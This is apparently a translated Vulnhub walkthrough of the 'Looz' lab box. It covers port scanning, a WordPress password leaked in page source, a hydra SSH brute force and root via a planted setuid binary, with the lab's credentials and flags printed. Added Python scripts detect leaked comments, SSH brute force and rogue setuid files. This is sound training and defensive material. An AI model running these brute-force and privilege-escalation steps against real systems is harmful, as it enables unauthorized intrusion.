
Vulnhub: Detailed Walkthrough of the Looz Target Machine

Time: 2023-02-04 16:55:30

Looz

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:76:42:e1      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.119  08:00:27:76:a1:7d      1      60  PCS Systemtechnik GmbH     

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.119.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.119 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 22:57 EST
Nmap scan report for 192.168.56.119
Host is up (0.00039s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4802386769719099d50b194c98da50c (RSA)
|   256 3d525e29fb2f29e801e45d1ba11ef34b (ECDSA)
|_  256 f0f477dc3d53c3c5358287a5ba57b449 (ED25519)
80/tcp   open   http         nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Home
|_http-generator: Nicepage 3.15.3, nicepage.com
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
3306/tcp open   mysql        MySQL 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.10-MariaDB-1:10.5.10+maria~focal
|   Thread ID: 5
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, Support41Auth, ConnectWithDatabase, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: Lu(eFnu$PEJ"ilc.WN`y
|_  Auth Plugin Name: mysql_native_password
8081/tcp open   http         Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://192.168.56.119/
MAC Address: 08:00:27:76:A1:7D (Oracle VirtualBox virtual NIC)
Service Info: Host: 172.17.0.3; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.96 seconds

Getting a shell

Port 3306

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ mysql -uroot -p -h 192.168.56.119
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ mysql -uroot -p -h 192.168.56.119
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)

Checked whether the MySQL root account had a weak or empty password; both attempts were denied.

Port 80

Visiting port 80 in a browser, the page source contains the following comment:

<!--- john don't forget to remove this comment, for now wp password is  y0uC@n'tbr3akIT--->
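
A comment like the one above is exactly what a pre-publication check of the site's own HTML should catch. As an added example (not code from the original post), here is a small Python script that extracts every HTML comment from a page and flags the ones mentioning credential keywords; the SAMPLE_PAGE and the keyword list are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Words that usually mean a credential was left behind in a comment
SECRET_KEYWORDS = re.compile(
    r"\b(password|passwd|pwd|secret|token|api[_-]?key|credentials?)\b", re.IGNORECASE
)

class CommentCollector(HTMLParser):
    """Collects the text of every HTML comment in a document."""
    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())

def find_secret_comments(html):
    """Return the comments in `html` that mention a credential keyword."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return [c for c in parser.comments if SECRET_KEYWORDS.search(c)]

# Constructed sample page; the second comment mirrors the one found on this box
SAMPLE_PAGE = """<html><head><title>Home</title></head>
<body>
<!-- layout: hero section starts here -->
<!--- john don't forget to remove this comment, for now wp password is  y0uC@n'tbr3akIT--->
<p>Welcome</p>
</body></html>"""

if __name__ == "__main__":
    for comment in find_secret_comments(SAMPLE_PAGE):
        print("credential-like comment found:", comment)
```

Running it over a site's rendered pages (or over the theme templates before deployment) turns a leak that depends on a visitor reading the source into a build-time finding.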
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ nikto -h http://192.168.56.119     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.119
+ Target Hostname:    192.168.56.119
+ Target Port:        80
+ Start Time:         2023-02-03 23:36:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-02-03 23:37:00 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (nginx/1.18.0) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 


Port 8081

Visiting port 8081 automatically redirects to port 80.

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ gobuster dir -u http://192.168.56.119:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.119:8081
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/03 23:41:12 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.119:8081/: Get "http://192.168.56.119:8081/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

Directory scanning with gobuster errored out.

Try nikto instead:

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ nikto -h http://192.168.56.119:8081
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.119
+ Target Hostname:    192.168.56.119
+ Target Port:        8081
+ Start Time:         2023-02-03 23:42:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.20
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://wp.looz.com/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7918 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-02-03 23:43:24 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 


The Nikto results show that the target runs WordPress; open the login script in a browser:

http://192.168.56.119:8081/wp-login.php

The page source shows that a hostname record for the target needs to be added to /etc/hosts:

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.119  wp.looz.com

Refreshing /wp-login.php now shows the classic WordPress admin login page. The username and password are already known from the earlier comment, so try logging in to the backend:

The login succeeds (the first attempt failed with a prompt to enable cookies; without changing anything, the second attempt succeeded).

When trying to replace the 404.php template and clicking Update File, an error appears:

Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

Other ways of uploading a shell all failed. In the WordPress backend, however, gandalf is also an administrator, so check whether hydra can crack that user's SSH password:

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ hydra -l gandalf -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.119
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-04 00:08:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.119:22/
[STATUS] 136.00 tries/min, 136 tries in 00:01h, 14344264 to do in 1757:53h, 15 active
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 14344084 to do in 2269:39h, 15 active
[STATUS] 98.71 tries/min, 691 tries in 00:07h, 14343709 to do in 2421:46h, 15 active
[STATUS] 98.22 tries/min, 1475 tries in 00:15h, 14342925 to do in 2433:43h, 15 active
[STATUS] 97.24 tries/min, 3016 tries in 00:31h, 14341384 to do in 2458:08h, 15 active
[STATUS] 96.46 tries/min, 4535 tries in 00:47h, 14339865 to do in 2477:49h, 15 active
[STATUS] 96.66 tries/min, 6091 tries in 01:03h, 14338309 to do in 2472:23h, 15 active
[22][ssh] host: 192.168.56.119   login: gandalf   password: highschoolmusical
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-04 01:17:21

It took more than an hour to crack the password.
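
A run like the one above leaves a dense trail of "Failed password" lines in the target's auth log, and the "Accepted password" that follows the burst is the event most worth alerting on. The following is an added example, not code from the original post: a Python detector that replays constructed sshd syslog lines (modelled on this hydra run; the year is assumed to be 2023 because syslog timestamps omit it) and raises an alert when one source exceeds a failure threshold inside a sliding time window, and again when that same source later logs in successfully.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the classic syslog-format sshd password-authentication lines
SSHD_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_line(line, year=2023):
    """Return (timestamp, result, user, src) or None for non-matching lines.
    Syslog omits the year, so the caller supplies it (assumed 2023 here)."""
    m = SSHD_LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bruteforce(lines, threshold=10, window_seconds=600):
    """Alert once per source that reaches `threshold` failures inside a sliding
    window of `window_seconds`, and again if that source later authenticates."""
    alerts = []
    recent_failures = defaultdict(deque)   # src -> failure timestamps in window
    flagged = set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, src = parsed
        window = recent_failures[src]
        if result == "Failed":
            window.append(ts)
            # drop failures that fell out of the window
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(f"{src}: {len(window)} failed logins within "
                              f"{window_seconds}s (last user tried: {user})")
        elif src in flagged:   # an "Accepted" line from a source already flagged
            alerts.append(f"{src}: successful login as {user} after brute-force burst")
    return alerts

def sample_log():
    """Constructed sshd lines modelled on the hydra run against this box."""
    lines = ["Feb  4 00:05:11 looz sshd[1100]: Failed password for alatar "
             "from 192.168.56.1 port 40011 ssh2"]
    for i in range(12):
        lines.append(f"Feb  4 00:08:{30 + i:02d} looz sshd[{1200 + i}]: Failed password "
                     f"for gandalf from 192.168.56.206 port {51000 + i} ssh2")
    lines.append("Feb  4 00:09:40 looz sshd[1300]: Accepted password for gandalf "
                 "from 192.168.56.206 port 52310 ssh2")
    return lines

if __name__ == "__main__":
    for alert in detect_bruteforce(sample_log()):
        print("ALERT", alert)
```

The single benign failure from 192.168.56.1 never reaches the threshold, the twelve rapid failures from 192.168.56.206 do, and the later success from the same source produces the second, higher-severity alert. In practice the same logic is what fail2ban or an SSH rate limit applies at the source, and key-only authentication removes the password guessing surface entirely.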

┌──(kali㉿kali)-[~/Vulnhub/Looz]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 04 Feb 2023 08:32:46 AM UTC

  System load:  0.0               Processes:                133
  Usage of /:   80.0% of 6.82GB   Users logged in:          0
  Memory usage: 41%               IPv4 address for docker0: 172.17.0.1
  Swap usage:   0%                IPv4 address for enp0s3:  192.168.56.119


63 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


gandalf@looz:~$ id
uid=1001(gandalf) gid=1001(gandalf) groups=1001(gandalf)
gandalf@looz:~$ 

gandalf@looz:/home$ cd alatar
gandalf@looz:/home/alatar$ ls -alh
total 44K
drwxr-xr-x 5 alatar alatar 4.0K Jun  7  2021 .
drwxr-xr-x 4 root   root   4.0K Jun  7  2021 ..
-rw------- 1 alatar alatar   45 Jun  7  2021 .bash_history
-rw-r--r-- 1 alatar alatar  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 alatar alatar 3.7K Feb 25  2020 .bashrc
drwx------ 2 alatar alatar 4.0K Jun  7  2021 .cache
drwxrwxr-x 2 alatar alatar 4.0K Jun  7  2021 Private
-rw-r--r-- 1 alatar alatar  807 Feb 25  2020 .profile
-rw-r--r-- 1 alatar alatar    0 Jun  6  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 alatar alatar   33 Jun  7  2021 user.txt
-rw------- 1 alatar alatar  734 Jun  7  2021 .viminfo
drwxrwxr-x 4 alatar alatar 4.0K Jun  7  2021 wordpress
gandalf@looz:/home/alatar$ cat user.txt
9acf80de68fbb344573762e84cced6f3
gandalf@looz:/home/alatar$ 

Got the user flag.

Privilege escalation

gandalf@looz:/home/alatar/Private$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount
/home/alatar/Private/shell_testv1.0
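
The last entry in that list is the odd one out: a setuid-root binary sitting in a user's home directory. As an added example (not the author's code), here is a Python baseline check that walks the filesystem for setuid files, compares them against an allowlist, and separately flags anything under user-writable locations. The 17 stock Ubuntu 20.04 entries from the listing above are used as the assumed baseline, and FOUND_ON_LOOZ is constructed from the find output on this box.

```python
import os
import stat

# Assumed baseline: the setuid binaries a stock Ubuntu 20.04 install ships with,
# taken from the listing on this box. A real deployment snapshots its own image.
BASELINE = frozenset({
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/snapd/snap-confine",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/chfn", "/usr/bin/mount", "/usr/bin/gpasswd", "/usr/bin/su",
    "/usr/bin/umount", "/usr/bin/pkexec", "/usr/bin/chsh", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/at", "/usr/bin/sudo", "/usr/bin/fusermount",
})

# A setuid file under any of these locations is never expected on a server
SUSPICIOUS_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

def collect_setuid(root="/"):
    """Walk `root` and return every regular file with the setuid bit set
    (the Python equivalent of `find / -perm -4000 -type f`)."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def classify(found, baseline=BASELINE):
    """Split setuid paths into (expected, unexpected, high_risk) lists."""
    expected = sorted(p for p in found if p in baseline)
    unexpected = sorted(p for p in found if p not in baseline)
    high_risk = [p for p in unexpected if p.startswith(SUSPICIOUS_PREFIXES)]
    return expected, unexpected, high_risk

# Constructed from the `find / -perm -4000 -type f` output shown on this box
FOUND_ON_LOOZ = sorted(BASELINE | {"/home/alatar/Private/shell_testv1.0"})

if __name__ == "__main__":
    expected, unexpected, high_risk = classify(FOUND_ON_LOOZ)
    print(f"{len(expected)} baseline setuid files, {len(unexpected)} unexpected")
    for p in unexpected:
        print("  unexpected:", p, "(high risk location)" if p in high_risk else "")
```

Replacing FOUND_ON_LOOZ with collect_setuid() turns this into a host check that can run from cron or a configuration-management agent; the shell_testv1.0 binary would be reported on the first run after it was planted rather than discovered by whoever logs in next.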


gandalf@looz:/home/alatar$ cd Private/
gandalf@looz:/home/alatar/Private$ ls -alh
total 28K
drwxrwxr-x 2 alatar alatar 4.0K Jun  7  2021 .
drwxr-xr-x 5 alatar alatar 4.0K Jun  7  2021 ..
-rwsr-xr-x 1 root   root    17K Jun  7  2021 shell_testv1.0
gandalf@looz:/home/alatar/Private$ ./shell_testv1.0 
root@looz:/home/alatar/Private# cd /root
root@looz:/root# ls -alh
total 52K
drwx------  5 root root 4.0K Jun  7  2021 .
drwxr-xr-x 21 root root 4.0K Jun  7  2021 ..
-rw-------  1 root root  498 Jun  7  2021 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4.0K Jun  7  2021 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   33 Jun  7  2021 root.txt
-rw-r--r--  1 root root   50 Jun  7  2021 rundocker.sh
-rw-r--r--  1 root root   66 Jun  7  2021 .selected_editor
drwxr-xr-x  3 root root 4.0K Jun  6  2021 snap
drwx------  2 root root 4.0K Jun  6  2021 .ssh
-rw-------  1 root root 8.0K Jun  7  2021 .viminfo
root@looz:/root# cat root.txt
ab17850978e36aaf6a2b8808f1ded971
root@looz:/root# 

Privilege escalation succeeded; got the root flag.

Lessons learned

  1. After logging in to the WordPress backend, look carefully at the available information, especially the user list; it reveals two administrator users.

  2. Then comes password cracking, even though on this box the cracking takes a very long time.

From: https://www.cnblogs.com/jason-huawen/p/17091883.html
